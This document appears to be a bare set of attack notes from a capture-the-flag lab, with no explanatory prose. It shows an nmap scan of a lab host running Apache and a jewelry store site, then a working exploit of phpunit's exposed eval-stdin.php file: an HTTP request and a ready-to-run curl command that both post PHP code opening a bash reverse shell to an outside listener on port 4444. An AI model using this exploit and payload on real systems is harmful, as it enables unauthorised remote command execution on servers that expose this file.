Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-27 01:59 IST
Nmap scan report for 10.10.11.146
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2 (protocol 2.0)
| ssh-hostkey: 
|   3072 be:66:06:dd:20:77:ef:98:7f:6e:73:4a:98:a5:d8:f0 (RSA)
|   256 1f:a2:09:72:70:68:f4:58:ed:1f:6c:49:7d:e2:13:39 (ECDSA)
|_  256 70:15:39:94:c2:cd:64:cb:b2:3b:d1:3e:f6:09:44:e8 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Diana's Jewelry

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.58 seconds

-------------------------------------------------------------------

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: store.djewelry.htb
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 272


<?php
$output=null;
$retval=null;
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.196/4444 0>&1'", $output, $retval);
print_r($output);
?>

------------------------------------------------------------------
    
curl -i -s -k -X $'POST' \
    -H $'Host: store.djewelry.htb' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' -H $'Content-Length: 147' \
    --data-binary $'<?php\x0d\x0a$output=null;\x0d\x0a$retval=null;\x0d\x0aexec(\"/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.21/4444 0>&1\'\", $output, $retval);\x0d\x0aprint_r($output);\x0d\x0a?>\x0d\x0a\x0d\x0a' \
    $'http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'    
    
    
    
    
    

